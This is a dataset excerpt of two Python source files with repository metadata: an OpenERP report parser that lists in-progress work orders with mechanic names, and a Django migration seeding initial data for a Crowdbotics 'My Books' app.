186c553da83db53ac91681c5d1650c41cc85b315 | c4702d1a06640555829b367852138cc93ba4a161 | /dym_work_order/report/dym_work_order_wip_report.py | 5f8b0c3e31094e8bc280dd6611091fac61612f93 | [] | no_license | Rizalimami/dym | 0ecadf9c049b22ebfebf92e4eab6eaad17dd3e26 | af1bcf7b77a3212bc8a8a0e41e6042a134587ed4 | refs/heads/master | 2020-04-08T10:56:43.605698 | 2018-11-27T06:44:08 | 2018-11-27T06:44:08 | 159,287,876 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,475 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
class dym_work_order_wip(report_sxw.rml_parse):
    # RML parser for the work-order WIP report: exposes helper
    # callables to the report template through localcontext.
    def __init__(self, cr, uid, name, context):
        super(dym_work_order_wip, self).__init__(cr, uid, name, context=context)
        self.localcontext.update({
            'time': time,
            'get_pricelist': self._get_pricelist,
            'lines_a': self._lines_a,
            'no_urut': self.no_urut,
        })
        # Running row counter used by the template ("no_urut" =
        # sequence number).
        self.no = 0
    def no_urut(self):
        # Return the next 1-based row number for the report table.
        self.no+=1
        return self.no
    def _get_pricelist(self, pricelist_id):
        # Resolve a pricelist id to its display name.
        pricelist = self.pool.get('product.pricelist').read(self.cr, self.uid, [pricelist_id], ['name'], context=self.localcontext)[0]
        return pricelist['name']
    def _lines_a(self, accounts):
        # Fetch all work orders that are neither draft nor done (i.e.
        # work in progress) joined with the mechanic's employee name.
        # The *accounts* argument is not used by this query.
        self.cr.execute("SELECT wo.name as name, wo.date as date, wo.no_pol as no_pol, wo.type as type, wo.state as state, wo.state_wo as state_wo, emp.name_related as mekanik_name from dym_work_order wo left join hr_employee emp on wo.mekanik_id = emp.id where state !='draft' and state !='done'")
        res = self.cr.dictfetchall()
        return res
class report_dym_work_order_wip(osv.AbstractModel):
    # Glue model that registers the report template with the
    # dym_work_order_wip parser defined above.
    _name = 'report.dym_work_order.dym_work_order_wip_report'
    _inherit = 'report.abstract_report'
    _template = 'dym_work_order.dym_work_order_wip_report'
    _wrapped_report_class = dym_work_order_wip
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
753ad43022f7a3191bb72fa131af59d5a1d65fe8 | b92fb53a2bebb8fd534258666b5ac9b9703af44b | /backend/home/migrations/0002_load_initial_data.py | 64a22060ef08f587e02ba57b0fdf868eb35edced | [] | no_license | crowdbotics-apps/my-books-17969 | 7d017780d7c51210820d153dcab35e1196cb9652 | 3f4f66c998bce11289b1fd2bdd74d2cf769cc2f0 | refs/heads/master | 2022-10-07T11:09:54.346439 | 2020-06-09T18:14:21 | 2020-06-09T18:14:21 | 271,076,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,286 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
    """Seed the single CustomText row with the application title."""
    custom_text_model = apps.get_model("home", "CustomText")
    custom_text_model.objects.create(title="My Books")
def create_homepage(apps, schema_editor):
    # Seed the HomePage row with the default Crowdbotics landing markup.
    HomePage = apps.get_model("home", "HomePage")
    homepage_body = """
    <h1 class="display-4 text-center">My Books</h1>
    <p class="lead">
    This is the sample application created and deployed from the Crowdbotics app.
    You can view list of packages selected for this application below.
    </p>"""
    HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
    """Point the default Site (id=1) at the app name and custom domain."""
    site_model = apps.get_model("sites", "Site")
    domain = "my-books-17969.botics.co"
    defaults = {"name": "My Books"}
    if domain:
        defaults["domain"] = domain
    site_model.objects.update_or_create(defaults=defaults, id=1)
class Migration(migrations.Migration):
    # Data migration: after the initial "home" models and the sites
    # framework tables exist, seed the CustomText, HomePage and Site
    # rows defined above.
    dependencies = [
        ("home", "0001_initial"),
        ("sites", "0002_alter_domain_unique"),
    ]
    operations = [
        migrations.RunPython(create_customtext),
        migrations.RunPython(create_homepage),
        migrations.RunPython(create_site),
    ]
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.